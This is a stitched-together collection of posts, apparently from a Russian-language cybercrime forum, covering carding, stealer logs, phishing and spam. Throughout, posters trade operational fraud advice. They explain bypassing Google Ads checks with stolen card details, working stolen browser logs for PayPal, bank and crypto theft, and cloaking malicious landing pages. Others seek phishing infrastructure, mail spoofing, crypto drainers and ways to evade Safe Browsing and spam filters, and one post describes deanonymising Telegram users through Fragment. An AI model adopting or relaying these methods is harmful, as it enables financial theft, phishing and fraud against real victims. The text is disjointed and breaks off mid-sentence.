[OR-CAC-02] - Страна карты не соответствует платежному профилю
Click to expand...
Причина : Страна банка карты отличается от страны, указанной в платежном профиле.
Решение : Измените страну в платежном профиле или используйте карту, выпущенную в стране, указанной в профиле.
[OR-ACH-04] - Ограничения на банковские переводы
Click to expand...
Причина : На банковский счет наложены ограничения на переводы, такие как лимиты или блокировки.
Решение : Свяжитесь с банком для снятия ограничений или используйте другой способ оплаты.
[OR-IEH-04] - Проблемы с серверами Google
Click to expand...
Причина : Временные сбои на стороне серверов Google, мешающие обработке платежа.
Решение : Подождите некоторое время и попробуйте снова.
[OR-CBAT-05] - Ошибка при валидации карты
Click to expand...
Причина : Карта не прошла проверку в системе Google. Это может быть вызвано неправильным вводом данных или техническими проблемами.
Решение : Проверьте данные карты и повторите попытку, если проблема сохраняется, используйте другую карту.
P.s взято с статьи телетайпа
Spoiler: делаем Google ads акк
1. создаем на наш gmail google ads аккаунт
2.
выбираем эти пункты
вот и вязнулась карточка, обновляем кабинет и решаем следующую проблему
Spoiler: Решаем ошибки красные сверху
**Почему прилетает: использование плохих заюзаных платег, пополнение баланса на крупную сумму, вы используете платежки, которые уже были заблокированы, БА которые были проданы в много рук, большой дневной бюджет, плохие прокси, плохие настройки антибраузера.
Как избежать: Юзать чистые платежки, чистые незаюзаные бины. Ксли за льешь свои, то вносить платежи небольшими частями, не использовать платежки повторно, юзать чистые стабильные прокси, повышать дневной бюджет на 10-15 процентов в день, настроить правильно антидетект.
Как выйти: Подать апилку. Процент выхода с этого бана достаточно высок. **
**Почему прилетает: недостаточно баланса на платежке, не пополнили вовремя карту, техническая ошибка, отлетела платега.
Как избежать: использовать платеги с балансом, следить за балансом платежек, использовать лимиты.
Как выйти: Подать апеляцию, закрыть задолженность и пополнить карту, поменять платегу на другую, погасить задолженность другой платегой.**
**Почему прилетает: клоакинг, акканут связан с заблокированным аккаунтом, одинаковые домены, плохие хостинги и домены, плохие вайты.
Как избежать: использовать проверенные кло, избегать ситуаций, когда у аккаунтов появляется что-то общее. Больше приделять времени вайтам, смотрите в сторону хостингов и вайтов.
Как выйти: подать апелляцию и ждать чуда. С таких банов почти никогда не выходит.
Ограничения за обход системы могут быть применены при попытках обмана алгоритмов платформы и изменения контента. В большинстве случаев, после наложения таких ограничений, аккаунт приходится считать утраченным.**
**Почему прилетает: Вы продвигаете продукцию, которая вводит потребителя в заблуждение.
Как избежать: Модифицируйте крео, тщательно отслеживая использованные ключевые слова и вайты.
Как выйти: подать апелляцию.
Такую блокировку можно получить, если вы обещаете пользователю что-то с гарантией, которой на самом деле нет. Например, при продаже таблеток с обещанием гарантированного снижения веса. Также этот вид ограничения возможен, если вы имитируете бренд**
**Почему прилетает: Google выявил недобросовестные практики со стороны рекламодателя.
Как избежать: лучше настраивать клоаку, меньше лить на черноту
Как выйти: аккаунты по такой причине невозможно разблокировать.**
**Восстановление таких аккаунтов практически невозможно.
P.s взято с статьи телетайпа**
Всем привет, отрабатывал логи 2 года и заметил что качесвеного материала уже
давно не видел, решил лить сам
Купил стиллер Rhadamanthys+крипт
Столкнулся с проблемой, не знаю как лить трафик, ищу советы, сотрудничество
Опыта в трафике ранее не имел
Привет всем.
Как сделать так, чтобы доходило письмо с аттачем .doc , pdf , на корп мыло?
Просто не приходит, причем ответил реплаем на письмо - пришел текст, без
аттача, заебало уже.
Может кто шарит за почты тут объяснит как это все устроено? Спасибо
Здравствуйте, не будете любезны подсказать сервисы наподобие этих?
sMoreMail is the best way to Toast your inbox with email. Fast, free, and easy to use.
smoremail.com
MailBait is the best way to fill your inbox with email. Fast, free, and easy to use.
mailbait.info
Спасибо за ответ.
Способы получения трафика в телеграм канал. Раскрутка телеграм. Подскажите рабочие дешевые способы раскрутки группы- продажи услуг в тг. Сам в этом полный ноль. Буду рад любой помощи, спасибо.
На первый взгляд всё просто, но если углубиться в тематику сталкиваешься с рядом сложностей, которые препятствуют успешному запуску кампаний.
Способ будет передан не бесплатно, в несколько рук.
Считаю разумной ценой за способ 350$
Речь пойдет как выжимать платегу привязанную в гпей под ноль.
Как быстро и безполезненно тестить ключи или же подходы к офферу с затратами
порядка 3$ на 10-15 кампаний тестов.
Все мы когда либо слышали что перед тем как поставить свой оффер, нужно найти
к нему подход. Данный способ рабоатет как для поиска, для ютуба, так и для
кмс, дискавери. Абсолютно безраницы.
Суть способа в быстром и безполезненом отливе бюджета с карж СС или же со
своих. Не боясь банов.
Основной прикол в том, что у вас есть неограниченное кол-во аккаунтов под
запусков, без особых усилий.
В придачу к способу я поделюсь с вами сервисами, которые помогут вам
1 Проходить верифы + объясню как это делать правилно
2 Проходить апилы + объясню как правильно подавать апилки
3 Документы
4 Трастовые Платеги (всс)
3 Брать Документы которые жует гугл адс
Всех жду в лс телеграме, так как тут довольно редко в связи с занятности по
работе.
Также есть рабочий стабильный оффер с которым сейчас работаю, которым
поделюсь!
P.S. Делюсь оффером, так как тесты и отливы быстрых бюджетов перестали
интересовать и нашел более стабильный вариант работы! И нацелен на свою тиму.
Способ подойдет под отлив или тесты на крипту, ба, уник проекты, инсталлы и
белое!
https://xss.is/threads/103075/
t.me
Гарант-сервис XSS.is - xss.is/help/escrow/
Click to expand...
Есть например 100к почт гмайл
Есть например фишинг под таргет
Возможно ли сделать полноценную эмуляцию того же гмайл и слать как бы с
браузера через BAS или Chromium+NodeJS? Будет ли траст выше? Я полагаю
разорюсь на прокси, но интересна сама концепция, даже без учета расходов и
времени.
Как сейчас грамотно маскировать фиш в письме? Через гугл формы?
You must have at least 5 reaction(s) to view the content.
Народ подскажите пожалуйста:Как можно отправить СМС с рекламой на определенные номера если у меня есть база номеров?
Приветствую, есть ли какие то скрипты прогрева смтп / автоматизированные решения для прогрева свежего smtp ?
Ищу специалиста, который может помочь с EML шаблонами под спам.
Я скину что должно получиться, нужно подготовить готовый файл.
Если есть умельцы кто готов за деньги с таким помочь, оставьте контакты в
личку.
Кто поможет в гугл,яд протолкнуть запрещенку?
Монеткой отблагодарю,жду ваши предложения в лс,если что то ддос услуги
нужно.(А именно сайт)
Добрые люди доброго времени. В поиске консультации/партнерства.
Где реселлеры берут по 20-50 маршрутов( у всех с одинаковой маркировкой) на
для отправки смс? чтоб впихнуть их по итогу в 5-10 раз дороже.
Как найти поставщика который первоисточник ?
Помогите пожалуйста кто понимает в этом.
грубо говоря есть 50$
лить умею только ютуб, но качество и количество логов желает лучшего.
что можете посоветовать ?
работать с гуглом не готов т.к. опыта нету, ну или же могу под чьим-то
надзором
Хелоу пипл, в общем чем я занимаюсь, криптоскам, точечный пролив хомяков с балансом на стиллер под видом нфт игры. Буду рад любым советам. Если что не бейте, я тут кекич
Данная статья будет полезна тем, кто хочет познакомиться с теневой стороной заработка и узнать для себя что такое кардинг и какие направления в нём бывают. Надеюсь, эта статья поможет вам в этом разобраться и откроет глаза на все происходящее на темной стороне интернета. В этой линейке статей про кардинг, грех не упомянуть, что же такое кардинг.
Кардинг - это вид мошенничества, при котором кардер использует чужую банковскую карту (Реквизиты) для собственного обогащения без _ведома владельца.
В этой статье мы подробно рассмотрим именно разновидность кардинга - работа по
логам. Перейдем к сути. _
Лог - это данные с компьютера владельце, который содержит в себе
Cookie, пароли, информацию о железе, IP-адресс, а так же, файлы с рабочего
стола и аутофилы. Существует несколько видов логов:
• Главный **системный лог **— общая информация о системе, начиная с момента её запуска (данные о действиях с ядром Linux, обнаруженных устройствах, сетевых интерфейсах, работе различных служб вроде FTP-сервера или DNS-сервера, и ещё много о чём другом).
• Лог загрузки системы — сообщения от ядра. Сюда записываются данные об устройствах, которые загружаются вместе с системой. С помощью этого лога можно выполнить отладку системы, если она не загружается.
• Журнал авторизации пользователей — информация об авторизации пользователей. Здесь вы найдёте записи об успешных и неуспешных попытках входа в систему, логины пользователей, используемые механизмы аутентификации.
• Логи веб-сервера — журнал запросов к веб-серверу, информация об ошибках. Эта информация поможет найти битые ссылки и причины ошибок на сайте, а также покажет, кто слишком сильно нагружает сервер или пытается его взломать.
• Лог почтового сервера — записи обо всех отправленных и доставленных сообщениях, ошибки почтового сервера, причины отклонения писем.
• Логи базы данных — запросы к базам данных, ошибки сервера.
• Логи планировщика Cron — протокол выполненных задач, сообщения от самих команд , ошибки при запуске крона.
Dangerous
Есть несколько вариантов получения логов. Самый простой и не требующий усилий способ - это их покупка. На форумах достаточное количество селлеров, которые продают логи, и разные расценки.
Есть логи и по** 1$за штуку, есть и по 20$.Цена лога зависит от его качества, страны, а так же сервисов, которые там внутри находятся. Дороже всего в продаже логи США** . За счет того, что там огромное количество банков, а так же** PayPal** аккаунты. Логи, которые стоят по** 1$**, чаще всего без выборки, и в основном там всякий хлам, по типу соц сетей или игрушек, хотя бывает что везёт и попадаются стоящие вещи.
Например, покупая лог с** PayPal** аккаунтом, важно проверить не только
наличие пароля к нему, но и есть ли он в** Cookie-Файлах** . Проверяем
обычным поиском в текстовике с куками, по запросу** PayPal** . Если же там
есть строчки и не одна, то этот лог считается хорошим.
Также, помимо покупки логов, их можно получить с помощью вредоносных файлов -RAT и** Stealer** . Стиллеры перехватывают все** Cookie- файлы** , криптокошельки,PayPal аккаунты с компьютера жертвы и передаются вам. Дальше идет их отработка.Про саму отработку криптовалюты, PayPal и банков -мы подробнее поговорим в следующих статьях. RAT-ки же, дают удаленный доступ к** ПК** , с помощью которого можно заполучить логи жертвы и также их отработать
Популярные стилеры Phoenix и** Lumma** _собирают информацию о системе, в
которую входят:
1. Имя пользователя;
2. Имя компьютера;
3. Список установленного программного обеспечения;
4. Подробности об оборудовании;_
5.Сохраненные в браузерах пароли, куки, данные банковских карт и криптовалютных кошельков** - то, что нам нужно.**
Главная задача в работе с логом, это его ковыряние. В целом, логи содержат в себе достаточно информации, которая подойдет для различных целей. Тут уже личное дело каждого, кому и с чем нравится работать. Можно брать шантажем, можно красть чужие акки и после чего просить за них выкуп, можно работать с криптой, с биржами, с холодными кошельками, с акками** Ebay** ,Amazon и т.д.
Примеры Логов
В целом, самое главное в работе с логами, это чтобы система воспринимала нас
за жертву чьи данные были украдены. В основном, для работы требуются
антидетект браузеры:Okto Browser; Dolphin ;Incogniton и тд, а
также чистые** PROXY.На данный момент многие используют -Nsocks,
Windscribe** и** IP Vanish** . За частую, айпи не особо много значит для
нас, можно использовать любой, главное, чтобы у него не было блеков. На
отдельные страны, к примеру, при работе с** PayPal** желательно
подстраиваться под** ZIP**
Логи можно покупать, так же, как и мерчи, самореги,
Log-папка
На этом вводная статья на тему кардинга подходит к концу. Надеюсь, что вы
дочитали статью полностью и узнали что то новое.
Ребят всем привет работает ли схема щас fb + enroll?? Кто щас так льет, хотелось бы задать пару вопросов, буду очень благодарен
Возникли сложности в поиске актуального сервиса с подменой caller id для отправки смс. Нужно отправить пару точечных сообщений, какие есть варианты?
Привет где можно начать изучать и рассылать email -ы очень интересен какой софт употреблять и смтп серверы?
GM bad boy
Наверняка кто-то из вас работал с фармами USA и сталкивался с тем, что при
вязе карты через кабинет ADS гугл просит удержать с карты аж баснословные 50$
~~(это около миллиона рублей по нынешнему курсу)~~ :
Нет уж, для кармана арбитражника в 2023 году это неподъёмная сумма, смотрим обход:
выжимка из видео:
1. видим, гугл просит удержать 50$, закрываем ads.
2. переходим на pay.google.com и вяжем карту.
3. переходим в мерч <https://www.google.com/retail/solutions/merchant-
center/> и линкуем карту к ads'у
вы бесподобны. чекайте другие мои статьи.
Hallo allemaal, ik koop constant schelpen met sendmail AAN, als je zo'n
verzoek hebt om naar de pad te schrijven.
ALS JE MIJ EEN BERICHT HEBT OP ZENDMAIL SHELLS PLSS, ZAL IK BULK KOPEN EN EEN
GOEDE PRIJS BETALEN
TELEGRAM: @mapservanhetjaar
Откуда они беруться ? Насколько сложно фармить свои smtp для спама ?
Как можно создзать свои ?
Где можно купить ?
А именно TON, TRX, EVM дрейнеры
Всем привет! Хотел бы изучить email -рассылки (спам). Может кто подскажет какой софт нужно приобрести?
something I can use to mass send 10k-50k gmails and other mails in a campaign and it hits inbox
Всем привет хотел бы узнать как вообще добываются SMTP сервера , как убедиться в валидности сервера ?
Всем привет, расскажите как лить трафик для стиллера.
Если можете напиши в тг: @sapport1
Всем привет ,подскажите пожалуйста на каком сервисе лучше создать корп имейл
для рассылки по базам на 500-1к получателей с наибольшей эффективностью.
Базы маленькие нужен максимальный инбокс.
Hello XSS family,
I am looking out to start mass phishing campaigns. Need proper phishing infra planning from A to Z with lowest/ free cost (through legit services) Suggestions/ advice needed in setting up server to distribution. New methods. Pls DM me whatever advice you have.
Thank you
Интересует не обычный Bas скрипт а эмуляция с андроида (т.к с телефона дает
загрузить 50 роликов)
Хочу сделать ферму аккаунтов под пролив
Для кого-то этот опыт покажется чем то обыденным. Новичкам из мира арбитража он будет полезен.
Повесть о двух мирах.
Еще задолго до регистрации на этом ресурсе произошло данное взаимодействие.
Познакомились в одном из Телеграм чатов, где герои повествования искали себе
арбитражника, исполонителя их задумки для работы по западной Европе.
Лучшие условия которые только может представить себе арбитражник.
Предоставление всех расходных материалов,
точнее оплата закупки, дейли бюджет выше среднего. Естественно такие вещи
затмевают
и притупляют внимание. Ты мысленно покупаешь себе жизнь класса люкс. Но как
всегда, в этом бренном мире,
фантазии разбиваются мелкими брызгами о суровую реальность.
После того как оговорили все сроки на подготовку, перечисления денег, на тот
момент я не догадывался, что бывает работа
через гаранта, которому заказчик переводит сумму. Как я и говорил ранее, когда
на тебя сваливается такой щедрый заказчик ты
не анализируешь.
Настает время работы, тесты и сплиты проведены и мы начинаем заливать на
связку которую обсудили и создали с заказчиком.
Начинаю лить на оффер. Трафик стаибльный, отличный. Большое количество лидов
отстукивающих в бота телеграм, обработанных
командой заказчика, навевает о будущей безбедной жизни. Скоростные выплаты на
криптокошелек заставляет тебя верить в людей.
Таким образом проходит несколько дней.
И тут Ваш ТС решил отличиться. Заказчика не было онлайн, обоговорить или
предупредить его о своем поступке не было возможности.
Решил сделать приятно команде. Начал масштабироваться. Увеличил количество
трафика в несколько раз. Используя свои средства, не те которые выделялись.
По меркам арбитража, для соло арбитражника поднял планку на максимум дейли по
деньгам.
Количество лидов, отстукивающих в бота не увеличилось. Арбитражники с опытом
уже поняли, что запахло банальным шейвом.
Не сообщая данной детали заказчику, решил проверить как наши старшие боевые
товарищи проверяли CPA сети, в далекие времена.
Совершенно верно, мои оппоненты не знали что их так можно проверить. Или
уверовали в себя.
Найдя возможность сделать некоторое количество карт того ГЕО где велась работа
и пополнить их балансом. Были сделаны тестовые закупки. Полностью мимикрируя
под холдера.
И конечно же они не отобразились в общей статистике бота.
Разборки? Да, были. Заказчик пытался доказать свою правоту, но после
предоставления скриншотов с личных кабинетов карт дропов. Удалил диалог и чат
в Телеграм.
Наверное у некоторых людей воровство проявляется во все стороны жизни. Можно
было работать честно и долго.
Мораль? Арбитражники, всегда проверяйте ваших партнеров. Возможности есть.
Spoiler: Заметка
Товарищ майор, когда будешь читать данный текст, помни, это бред и фантазии автора. Заводить дело не нужно.
нужен спам по вашим базам :корп меил моим xls первый контакт в лс
Spoiler
You must spend at least 7 day(s) on the forum to view the content.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)
](https://mega.nz/folder/0iIjGDxB#XsvkIsPWPRu9PEC0nDsXmg)
3 files
mega.nz
Подскажите, что сейчас актуально слать? Раньше док залетал, но насколько мне известно после недавней обновы на свежих вордах появляются дополнительные алерты, которые портят отстук. Знаю, что сейчас мода на ярлыки передающие управление на пш, но на практике ни у кого такого не видел. Кто что посоветует?
Gmail метит ссылки в письме такими табличками срезая конверсю в ноль. Шлю строго 1 получатель = 1 уникальный редик, поэтому вариант, что пожаловался кто-то один и ссылка легла у всех исключен. Непонятно по какому принципу гугл метит мою рассылку. Ссылка - открытый редирект самого гугла. Сталкивался кто- то с таким? Какие редиректы используете для гугла?
Что нам показывают?
Как это же сделать?
Spoiler: делаем
Тут генерация объявы просто идет с последующим удалением ненужных заголовков
asdas
babas
wise
com
net
uk
Вот так и вылавливаем wise .com
И что у нас получается?
правильно!
Льете на оригинальный домен любой кампании(домен/ключи/описания/выдача и траст
от источника), целевой пользователь попадает на ваш блек после клика на
оригинал
очень много на рынке цыганей без обид
которые пытаются этот метод продать за 3000 а то и за 15 000 $
есть более интересные методы обхода - но их пока не отработаю до конца -
сливать не буду! но ждите!
ищу трафера по направлению Google, Yandex, Instagram, Facebook
Всем привет! На адреса некоторых небольших европейских почтовиков иногда приходят письма, в заголовках которых нет никаких данных об отправителе, включая айпи адрес.
Spoiler
Content-Type: multipart/alternative; boundary="ftV0zHb1684b=_?:"
To: mail@freemail.hu
Message-Id:
<leuR8yd7.qMSkfKUBj62B9RTqRwwJr22ShrCM5H36XMjJ0Kc92x2vaLwfkf@freemail.hu>
Date: Mon, 01 Mar 2021 20:27:48 GMT
MIME-Version: 1.0
Subject: contact WhatsApp
From: Serilda <sultwa@match.com>
--ftV0zHb1684b=_?:
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Под спойлером - пример такого письма.
Помимо этого, иногда встречаются письма с айпи адресами вроде 1.1.1.1 в
заголовке received from.
Хотелось бы знать, как такое возможно?
Ищу куда пристроить мобильный траф с Facebook, предложения в: @qunqa
i looking for a reliable hosting that dosent get blocked or sespended while performing scans or hosting botnets
1. Как сделать правильный пролив и отдачей трафика по ПРОМОКОДУ ИЛИ ССЫЛКЕ
2. Видео создавать с ИИ ; какие сайты с интеграцией выбрать правильные и
уникализировать видео.
Поделитесь опытом; или напишите в ПМ.
Ку всем. Изучаю спам по мылу. Возник вопрос.
Есть ли адекватный способ чекнуть базу мейлов на пару лям строк фри способом? Может чекеры есть какие? Или реализовать как то возможно.
Проблема в том, что при отправке вроде валидных почт, много не попадают до получателся по разным причинам.
Здравствуйте!
Много прилетает вопросов по сбору валида и откликов.
Показываю самый простой способ формировать список активной базы.
Техника новичковая, но и вопросы подобные задают именно они.
Здравствуйте!
Как поживаешь?
В настоящее время мне нужен специальный сервис или метод подделки электронной почты.
Специально для адресов электронной почты, обслуживаемых G-Suite.
Отправить адреса электронной почты входящих сообщений в G-Suite непросто.
Если у вас есть хороший, свяжитесь со мной!
Благодарность,
Hello Forums Fellows, I want to learn Spamming Using Stealers for logs and CC.
Can Someone help me?
Thanks.
Всем привет! Ищу актуальные методы и схемы добычи траффика, превращение его в
инсталлы. Обладаю хорошей ресурсной базой, есть много своих наработок. В связи
с этим хочу предложить партнерские отношения людям, кто имеет собственные
наработки и опыт. Выкуплю готовый продукт по рыночной стоимость,
вложусь\помогу ресурсами\людьми, но только в реальные темы. Фантазеров и кидал
учую за версту. Меня не интересуют разработки "ваших друзей", мифические одеи
на пдф и доки. Меня интересуют грамотные специалисты, с которыми можно
заработать денег вместе. Помогу со всем необходимым инструментарием, поделюсь
своим опытом, предоставлю рекомендации.
Так же приглашаю к сотрудничеству
копирайтеров\дизайнеров\разработчиков\переводчиков. Рассмотрю варианты как
сдельной работы, так и работы на окладе.
Начнем сразу по делу, что знаю я
Помню читал кейс как тип заливал инвайты в чат в тг, затем через фиш сайт
уводил крипту у мамонтов, за год оборотка на кошельке была что-то вроде 800к
баксив, ничего не мешает заменить в этой связке фиш на стилак с более менее
вменяемый предлогом
Еще один варик работы - это твиттер, трафик именно по художникам, как по мне
немного подтух, из-за популяризации данной темы на лолзе
Видел новость как индус ломал акки политиков и через трастовые акки уводил
крипту, лично я пробовал раскручивать профиль через реки и спамером,
получилось честно не очень совесм, хотя в твитере оч дохуя трафика
Доброго времени, друзья
Подскажите пожалуйста, как можно обойти спам фильтры гмйла, вёрстк
10\10,.Сокрщлки. Часто меняю домены. используя разные smtp сервисы везде спам
от них
Может есть вариация поднимать личный smtp но тоже кажется спам будет
Такой вопрос. Имеется на руках дрейнер Но есть проблема с трафиком - не умею в СЕО\Google Ads и тд. Видел кто-то льет на Твиттер Аирдропы, но лично у меня не очень идет. Актуален ли Твиттер (спам @ под постом)? Что насчет Телеграма? Заходит ли? Какие ГЕО? А Дискорд? Вообщем любая полезная инфа приветствуется!
Дополнительный вопрос!
В чем заключается регулярное обновление дрейнера? Смартконтракт со временем
перестает работать?
_Не обучаем (временно скоро начнём)
Только с опытом
Лучший % 75-80
Постоянное пополнение мануалов
Обновление Функционала_
**Подавать заявку cюда:@Pygmalioncrypto_Bot**
How can I find some open mail relays in order to perform spamming?
You must have at least 1 reaction(s) to view the content.
Добрый день.
Решил купить софт для небольших спам-рассылок и рассматриваю два варианта: 1. LetsExtract Email Studio, 2. epochta.
Был бы благодарен за реальные отзывы по этому софту, возможно, сравнение или рекомендацию других вариантов для рассмотрения.
Ребят подскажите, как вытащить запросы с логов? Через какую софтину можно обработать?
Объясните пожалуйста, как пользоваться XEvil для решения с его помощью гугл капчи-картинки(найди светофоры)? В каком виде и как давать их этой программе? Хевил не демка. Просто скриншот нельзя добавить, там же капчи с динамически появляющимися картинками.
Мне интересно, что вы думаете об использовании инструмента искусственного интеллекта, особенно ChatGPT, в почтовой рассылке. И как, по-вашему, будет выглядеть будущее в течение следующих 2 лет. Которое уже не за горами!
P.S.:Извините за мои русские. Возможно, мне нужны русские друзья, чтобы в следующий раз писать лучше.
Запускаю ленд после суточного грева, проходит модерку, сразу идет куча трафика, у меня отстук в телеге на скачку стилера с блека, когда мамонт кнопку скачать нажимает, за 10 минут может прийти 70-100 уник посетителей в (клоака показывает), а потом все резко останавливает и может до 2 суток висет с одной и той же статой
Что мне нужно подготовить? Нужно ли мне строить почтовое отделение? Или для отправки нужно чужое почтовое отделение?
Всем привет, ищу того кто может пролить траф на видео в Ютуб , с предложениями в лс
Доброго времени суток)
Необходимо получить доступ к почте (gmail).
Решил отправить фишинговое письмо, ведущее на сайт, содержащий форму для кражи
данных.
1. Зарегистрировал домен (3 дня назад)
2. Создал сайт (достаточно уникальный по наполнению)
3. Настроил на VPS свой SMTP-сервер
4. Настроил записи DNS для почты (spf, DMARC, DKIM)
Перед отправкой решил протестировать:
ProtonMail - письмо дошло
Gmail - письмо ушло в спам
Письмо составлено аккуратно. Имеется HTML-подпись (с логотипом компании). Не содержит спам-слов. Имеется ссылка на сайт.
Почему письмо ушло в спам? Как гарантированно отправить фишинговое письмо единственному получателю?
Всем привет! Посоветуйте пожалуйста где взять нормальные прокси Socks5 с открытыми под SMTP портами
Субж
Продам Indeed ziprecruiter и другие эмплоер аккаунты
писать в личку
гаранат этого форума
Каким сервисом вы проверяете отсутсвие красных экранов и уведомлений безопасности?
Making the world’s information safely accessible.
safebrowsing.google.com
Что то кроме этого? Онлайн сервисы проверки?
нужны сервисы, форумы или чаты в тг, где люди из eu ищут работу по инету
Всем привет! Есть у кого то php скрипт для email spoofing с прикреплением файлов?
I will be launching one Google Ads campaign for free for one lucky user. Drop your campaign or project ideas, and I will consider one to launch. Submit only one idea—one campaign for one person. Let's go!
**Случайно наткнулся на одну из статей об "анонимности" Fragment и решил поделится содержимым которое вполне может кому-то пригодится, ведь можно спарсить нормальную аудиторию холдеров да еще и с привязкой к телеграмму. Собственно переходим к самому процессу, будет показан ручной вариант, но думаю при желании все можно автомазировать с помощью парсера и чеккера.**
Переходим на Fragment в раздел «Numbers» и
вбиваем любой номер. Он может быть либо еще доступным для
покупки,
либо уже проданным.
Fragment позволяет легко найти какие номера в каком статусе.
Статус «Sold» (продано). Все проданные номера, владельцы которых либо уже
используют их для аккаунтов Telegram, либо еще не решили, что с ними делать
(использовать, перепродать, просто хранить).
Раздел со статусом «Sold» нам и нужен. Все данные в открытом виде (ну это же
блокчейн!), а значит парсить (разово или регулярно) все проданные номера можно
даже без специальных знаний.
Далее, в зависимости от потребностей и технических возможностей проводим чекинг (проверку номера телефона на наличии зарегистрированного аккаунта в Telegram) определенных или всех NFT-номеров. Самый простой и бесплатный способ (сможет каждый), это чекнуть через добавление в контакты…
Вот и связали аккаунт с номером, с адресом в блокчейне TON. Как бонус знаем,
что человек пользуется кошельком Tonkeeper.
Видим все его транзакции и знаем какие у него есть еще NFT (номера, юзернеймы
и т.д.). Узнать ID аккаунта и проверить его через любой OSINT-бот на
дополнительные данные дело нескольких минут.
Собираем все воедино и до кучи получаем, что централизованная платформа
Fragment (неизвестно кому принадлежащая, но явно аффилированная с Павлом
Дуровым) является отличным открытым источником для сбора данных и
идентификации личности.
Можем сделать также вывод - если предварительно (да и позже) не предприняли
необходимых мер по защите конфиденциальности, то, покупая на Fragment номер
+888 и регистрируя на него телеграм-аккаунт, вы себя фактически сразу
деанонимизируете.
Буду благодарен за лайк на тему, если информация была Вам полезна или просто Вы об этом не знали
Нужен спамщик с подменой.
Обьем 20-50 млн писем в день.
Оплата + % для мотивации, оплата сразу, % после реализации. (В гарант залью
без проблем)
ТГ: @lincolnjunior7
Инбокс не ниже 50%
Работа на каждый день.
Добрый,нужно нагнать много трафа на домен,(без реклам и сео) домен
новорег,теория гласит что к домену через который проходит много трафа более
трастовей относится
Возможно есть сервис для такого или другой способ,всему буду рад)
Про домены с историей знаю,но зачастую те что я брал сразу обход получал
Google Safebrowsing состоит из четырех частей:
ранее посещенных сайтов
Хром считает и хранит сумму пикселей каждого цвета на всех страницах, которые вы посещаете. Таким образом если вы копируете дизайн логин-формы или посадочной страницы один-в-один, она будет определена как фишинговая. Чтобы сбить этот механизм с толку, достаточно использовать смещение цветовой палитры через css.
Вот пример javascript-кода, который следует поместить в head-секцию сайта, внутрь